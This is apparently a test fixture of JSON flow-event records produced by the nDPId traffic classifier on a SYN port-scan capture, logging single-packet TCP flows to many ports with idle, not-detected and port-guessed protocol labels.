-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6699,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18988,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1058,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2604,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"OSPF","breed":"Acceptable","category":"Network"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1058,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2605,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"BGP","breed":"Acceptable","category":"Network"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2605,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"BGP","breed":"Acceptable","category":"Network"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1840,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2607,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1840,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1921,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2607,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1921,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2608,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2608,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1894,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":563,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1894,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":563,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1958,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":563,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1958,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":563,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4662,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4662,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4662,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4662,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33354,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33354,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33354,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33354,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":587,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMTPS","breed":"Safe","category":"Email"}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":587,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":587,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMTPS","breed":"Safe","category":"Email"}} 
-00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":587,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2638,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2638,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2638,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2638,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":593,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":593,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1933,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1933,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1019,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16992,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1019,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16992,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1989,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 